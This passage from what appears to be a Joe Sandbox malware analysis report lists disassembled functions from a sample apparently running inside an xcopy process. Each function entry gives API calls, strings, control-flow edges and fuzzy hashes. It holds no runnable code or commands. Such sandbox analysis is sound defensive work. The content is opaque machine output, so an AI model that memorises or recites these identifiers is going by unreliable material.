                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ddbb4d465ce140364d86204897d5b7cec958bc41700b554c80bd3fe1637fe622
                                  • Instruction ID: 9885a72ea57494115d26372a91baad531ee3a80d8a5ecf4d4ebe52fa9a114632
                                  • Opcode Fuzzy Hash: ddbb4d465ce140364d86204897d5b7cec958bc41700b554c80bd3fe1637fe622
                                  • Instruction Fuzzy Hash: 3690026524955502E150B15C44086164059A7E1201F55C021B081C594D865589597221
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4fbdc1f098482d9e1a1581892df2050c21b32ec521e39468af92cdf1cae3c548
                                  • Instruction ID: a5cc2f321dd805c1bf5db5654ab3c57c68ad611f172ef8ddc2a25c41a6f63555
                                  • Opcode Fuzzy Hash: 4fbdc1f098482d9e1a1581892df2050c21b32ec521e39468af92cdf1cae3c548
                                  • Instruction Fuzzy Hash: 74900265605504425140B16888489064059ABE2211755C121B099C550D865989696665
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f024e45e50a5e4f3447e70c91a9838d180cafe6f0d74733a78209c82c1efd1da
                                  • Instruction ID: 427df0ab31bf49116e3160ec026149f4d9aab3f81543aec3c17c91aa334288e9
                                  • Opcode Fuzzy Hash: f024e45e50a5e4f3447e70c91a9838d180cafe6f0d74733a78209c82c1efd1da
                                  • Instruction Fuzzy Hash: 3D900265215D0442E200B5684C18B07005987D1303F55C115B015C554CCA1589656521
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6ae5bd837d81f93fceddf0d8596854a8fa99eb2eb01f2cd6c71595b103288481
                                  • Instruction ID: 0ea832682cd932623c5bf9a711f4be10bb2e1e0daa5b6f7a29986da9af5ddf77
                                  • Opcode Fuzzy Hash: 6ae5bd837d81f93fceddf0d8596854a8fa99eb2eb01f2cd6c71595b103288481
                                  • Instruction Fuzzy Hash: 749002A534550842E100B1584418B060059C7E2301F55C015F106C554D8719CD567126
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5030aeaf2a0cd19328fddbdd7abb83dbf8d37b43fa7cc9f6071e85088df030dc
                                  • Instruction ID: 7a51aa20612d7814b00cc6b7cfbfdca5c3614b2ea0bb8955ba69cb1d6bebfce9
                                  • Opcode Fuzzy Hash: 5030aeaf2a0cd19328fddbdd7abb83dbf8d37b43fa7cc9f6071e85088df030dc
                                  • Instruction Fuzzy Hash: A690026560550902E101B1584408616005E87D1241F95C022B102C555ECB258A96B131
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e4eac9761efce08adb851b79d23993b10da738c41717753fd8b4b2c67f51fd87
                                  • Instruction ID: 8a3373e938c6cc3d3e8d524d905d03cdab2440818f56f0a59153a800ea37ac85
                                  • Opcode Fuzzy Hash: e4eac9761efce08adb851b79d23993b10da738c41717753fd8b4b2c67f51fd87
                                  • Instruction Fuzzy Hash: 4C9002A520590803E140B5584808607005987D1302F55C011B206C555E8B298D557135
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 90bfc9913170ffd5dfbac011fb3bc5d7c842c9127fff976eac539ebe494d729e
                                  • Instruction ID: 6bd46dc498d79c7ba3346b23aebf6e1fbf424d5147a0993e8823336ee48d2b1e
                                  • Opcode Fuzzy Hash: 90bfc9913170ffd5dfbac011fb3bc5d7c842c9127fff976eac539ebe494d729e
                                  • Instruction Fuzzy Hash: 43900265246545526545F1584408507405A97E1241795C012B141C950C8626995AE621
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6fb7f03f2b23caafcd0264ef52677fc94ce3df190393ad62a738848d3570bf1b
                                  • Instruction ID: 1bc82b76b12b17c0a462c6d56193a3cfd3185eef1cbeda2ff40a08cef8b36837
                                  • Opcode Fuzzy Hash: 6fb7f03f2b23caafcd0264ef52677fc94ce3df190393ad62a738848d3570bf1b
                                  • Instruction Fuzzy Hash: 6990027520550813E111B1584508707005D87D1241F95C412B042C558D97568A56B121
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a2e1ec9b598ebbf34b758ec3c263d04614d3e33ccf627c3f8a107eb079d7275c
                                  • Instruction ID: 151b40a74abc8eac6d07776726d7dd3b61f42f8a8c52c8d10922e943690078f4
                                  • Opcode Fuzzy Hash: a2e1ec9b598ebbf34b758ec3c263d04614d3e33ccf627c3f8a107eb079d7275c
                                  • Instruction Fuzzy Hash: 6390026D21750402E180B158540C60A005987D2202F95D415B001D558CCA15896D6321
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ecd677ed04534749e01f862d6fc9bbaf83f39db3d497c6cf8fe457828256dd3b
                                  • Instruction ID: 4d5cb88fcb9aaca86b4eeae3b848100249106da5b1d884473dab1726db4d056d
                                  • Opcode Fuzzy Hash: ecd677ed04534749e01f862d6fc9bbaf83f39db3d497c6cf8fe457828256dd3b
                                  • Instruction Fuzzy Hash: 0D90026530550403E140B158541C6064059D7E2301F55D011F041C554CDA15895A6222
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ac5cf57344307d8ecc3e71f884708af2dfcf27d4ab16aca42c225213c447f37b
                                  • Instruction ID: 90f9624f825bf7237fea5a20dacd3c5df55794478c9084198d09e5465dc2aa5c
                                  • Opcode Fuzzy Hash: ac5cf57344307d8ecc3e71f884708af2dfcf27d4ab16aca42c225213c447f37b
                                  • Instruction Fuzzy Hash: EC90027520550802E100B598540C646005987E1301F55D011B502C555EC76589957131
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b5498519f3de75b431465784092c691d93731e5af5c86ee0f0aac62a05cc0752
                                  • Instruction ID: dd18e2e52b5581243676347acb3fb548249b7245e213132097ffca177fd0e976
                                  • Opcode Fuzzy Hash: b5498519f3de75b431465784092c691d93731e5af5c86ee0f0aac62a05cc0752
                                  • Instruction Fuzzy Hash: 6590027520558C02E110B158840874A005987D1301F59C411B442C658D879589957121
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 399a9fc363e89b052cdcaad0856bbd1cc6145615db0789a4570b480ede56d1c1
                                  • Instruction ID: f5614a289e56e2b8a2499c1e64956399490f12b58b6cc8add09c972754b4a413
                                  • Opcode Fuzzy Hash: 399a9fc363e89b052cdcaad0856bbd1cc6145615db0789a4570b480ede56d1c1
                                  • Instruction Fuzzy Hash: 7C90027520550C42E100B1584408B46005987E1301F55C016B012C654D8715C9557521
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F3937D Relevance: 47.4, APIs: 1, Strings: 26, Instructions: 154threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 13 2f3937d-2f3937f 14 2f39381-2f39385 13->14 15 2f393d6-2f3973c 13->15 17 2f3938f-2f393b1 call 2f50c10 14->17 18 2f3938a call 2f31410 14->18 19 2f3974d-2f39759 15->19 26 2f393b3-2f393cf call 2f5ae57 CreateThread 17->26 27 2f393d0-2f393d5 17->27 18->17 21 2f3975b-2f3976d 19->21 22 2f3976f-2f39779 19->22 21->19 24 2f3978a-2f39793 22->24 29 2f397b1-2f397bd 24->29 30 2f39795-2f397a1 24->30 34 2f397e2-2f397e9 29->34 35 2f397bf-2f397e0 29->35 32 2f397a3-2f397a9 30->32 33 2f397af 30->33 32->33 33->24 37 2f397f0-2f397f4 34->37 35->29 38 2f397f6-2f3981a 37->38 39 2f3981c-2f39820 37->39 38->37 40 2f39843-2f39851 39->40 41 2f39822-2f39841 39->41 42 2f39857-2f3985b 40->42 41->39 43 2f39884-2f3988d 42->43 44 2f3985d-2f39882 42->44 45 2f3989a-2f398a0 43->45 46 2f3988f-2f39898 43->46 44->42 47 2f398a6-2f398ac 45->47 46->47 48 2f398b2-2f398bb 47->48 49 2f398c1-2f398da 48->49 50 2f39ad5-2f39adc 48->50 49->49 51 2f398dc-2f398f4 49->51 52 2f39b06-2f39b0a 50->52 53 2f39ade-2f39af0 50->53 54 2f398f6 51->54 55 2f398fb-2f39902 51->55 58 2f39b2d-2f39b34 52->58 59 2f39b0c-2f39b2b 52->59 56 2f39af2-2f39af6 53->56 57 2f39af7-2f39af9 53->57 54->50 60 2f39904-2f39916 55->60 61 2f3992c-2f39972 55->61 56->57 62 2f39b04 57->62 63 2f39afb-2f39b01 57->63 64 2f39b3a call 2f594f0 58->64 65 2f39c68-2f39c72 58->65 59->52 67 2f39918-2f3991c 60->67 68 2f3991d-2f3991f 60->68 69 2f39983-2f3998f 61->69 62->50 63->62 72 2f39b3f-2f39b58 64->72 67->68 73 2f39921-2f39927 68->73 74 2f3992a 68->74 70 2f39991-2f3999d 69->70 71 2f3999f-2f399a6 69->71 70->69 76 2f399b5-2f399c9 71->76 77 2f399a8-2f399b2 71->77 72->72 78 2f39b5a-2f39b64 72->78 73->74 74->55 80 2f399da-2f399e6 76->80 77->76 79 2f39b75-2f39b7e 78->79 81 2f39b80-2f39b8c 79->81 82 2f39b9c-2f39ba3 79->82 83 2f399e8-2f399fa 80->83 84 2f399fc-2f39a06 80->84 85 2f39b9a 81->85 86 2f39b8e-2f39b94 81->86 89 2f39ba5-2f39bbb 82->89 90 2f39bc8-2f39bd2 82->90 83->80 88 2f39a17-2f39a23 84->88 85->79 86->85 92 2f39a33-2f39a3d 88->92 93 2f39a25-2f39a31 88->93 94 2f39bc6 89->94 95 2f39bbd-2f39bc3 89->95 96 2f39be3-2f39bef 90->96 98 2f39a3f-2f39a5c 92->98 99 2f39a5e-2f39a68 92->99 93->88 94->82 95->94 100 2f39bf1-2f39c03 96->100 101 2f39c05-2f39c0f 96->101 98->92 104 2f39a79-2f39a82 99->104 100->96 103 2f39c20-2f39c2c 101->103 107 2f39c2e-2f39c3a 103->107 108 2f39c3c-2f39c40 103->108 105 2f39a84-2f39a97 104->105 106 2f39a99-2f39aa3 104->106 105->104 110 2f39ab4-2f39abd 106->110 107->103 108->65 112 2f39c42-2f39c66 108->112 113 2f39ad0 110->113 114 2f39abf-2f39ace 110->114 112->108 113->48 114->110
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F393C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID: +m$.G$5$5F$?]$?}$H$Nc$W0$\$^$_$`$`7$`g$mW$nq$oB$t$t?$tP$u$uk$wn$k${
                                  • API String ID: 2422867632-396652899
                                  • Opcode ID: 806f9ad9c04d794bbc9c6ca1e6c34ba9ca1fab5b9037643310aafe1def2c8a5e
                                  • Instruction ID: 609ae681bce8f6169b0fd155b4758b26b512f7eb54031e3180d3f8f5aa618bdc
                                  • Opcode Fuzzy Hash: 806f9ad9c04d794bbc9c6ca1e6c34ba9ca1fab5b9037643310aafe1def2c8a5e
                                  • Instruction Fuzzy Hash: E69169B0905768DBEB608F91CD587DEBBB5BB45308F1085C9D14C2B281CBFA1A88CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F40292 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 600 2f40292-2f40297 601 2f40298-2f40299 600->601 602 2f4029a-2f4029f 601->602 602->602 603 2f402a0-2f402b4 602->603 603->601 605 2f402b6-2f402e2 603->605
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: -507JlJ26-$-507JlJ26-
                                  • API String ID: 0-3526009599
                                  • Opcode ID: e0c84cdf72f43f094e65eba958582c6c91bd124cec880f01df2c83b1ba10d17c
                                  • Instruction ID: c3762452d62560907dd30eb4120ed87a46585ae12fd0e160687bf8a672e085db
                                  • Opcode Fuzzy Hash: e0c84cdf72f43f094e65eba958582c6c91bd124cec880f01df2c83b1ba10d17c
                                  • Instruction Fuzzy Hash: 0A41CB32A046896BDB169F709C41BAEBF64EF02660F1841DCDB905F1C2C7628107CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F40389 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(-507JlJ26-,00000111,00000000,00000000), ref: 02F4040D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: -507JlJ26-$-507JlJ26-
                                  • API String ID: 1836367815-3526009599
                                  • Opcode ID: bd5f6ecebee1f5a3d025d621b6220d8d8e42cb5139b5d82c9a14f074082c5fc3
                                  • Instruction ID: 143a3519a15f8d14d68b4d1de61099c0a7afd7e8c32701408a6b4b49629fd91c
                                  • Opcode Fuzzy Hash: bd5f6ecebee1f5a3d025d621b6220d8d8e42cb5139b5d82c9a14f074082c5fc3
                                  • Instruction Fuzzy Hash: D011A171D4021876EB21A6A08D02FDFBF7C9F42B94F108058FB047B280EBB466068BE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F40390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(-507JlJ26-,00000111,00000000,00000000), ref: 02F4040D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: -507JlJ26-$-507JlJ26-
                                  • API String ID: 1836367815-3526009599
                                  • Opcode ID: 2c6daabdc6d6bfcf689982c441b5a8468a11718a030ea25bd265bda8a7925211
                                  • Instruction ID: 39847b296e7b5c8509a84638b65fa7e02add929a2f3206793955bb8478e0b3c8
                                  • Opcode Fuzzy Hash: 2c6daabdc6d6bfcf689982c441b5a8468a11718a030ea25bd265bda8a7925211
                                  • Instruction Fuzzy Hash: 2E018471D4021876EB2196A08D01FDF7B7C9F42B94F148159FF147B281DAB466068BE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F524F0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02F525BB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 34fab4ee4296852ae495222b4d1a91441f26cb7c7719078568e57a4c7c6e3dc5
                                  • Instruction ID: c57350b158393f968c7a6f1e39cd84465b5fca143e5f116a5d831c2f3b312d75
                                  • Opcode Fuzzy Hash: 34fab4ee4296852ae495222b4d1a91441f26cb7c7719078568e57a4c7c6e3dc5
                                  • Instruction Fuzzy Hash: 8E316BB1600705ABD714EF64CC84FEBBBA9AB88740F00862DAB595B241D7B4B644CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F4E555 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 131COMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 02F4E577
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: dc9d5b5c3e7a07b5834272dba494bf296a77d88dff84a4439d815e1b8c97c2f9
                                  • Instruction ID: 970cdea31b4fee5ad0d0d2002ba33e5f53b51eab79b4052dfe4d0244274dc655
                                  • Opcode Fuzzy Hash: dc9d5b5c3e7a07b5834272dba494bf296a77d88dff84a4439d815e1b8c97c2f9
                                  • Instruction Fuzzy Hash: 774130B5A00209AFDB14DF98DC809EEB7B9BF88344B104559EA05E7214DB75EA45CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F4E560 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 02F4E577
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: ef9a2403e39d2e2fcc99eb5a02bf28c086bd0bde8cd9ad9d096e8642442cdb39
                                  • Instruction ID: ed23dd923bbbb793a2dd6f83b0c4627f81d1c3876e04f515ff6e0e031ea2e354
                                  • Opcode Fuzzy Hash: ef9a2403e39d2e2fcc99eb5a02bf28c086bd0bde8cd9ad9d096e8642442cdb39
                                  • Instruction Fuzzy Hash: AD311075A1020ADFDB00DFD8D8809EEB7B9BF88344F108559EA15E7214DB75EE45CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F43D70 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F43DE2
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
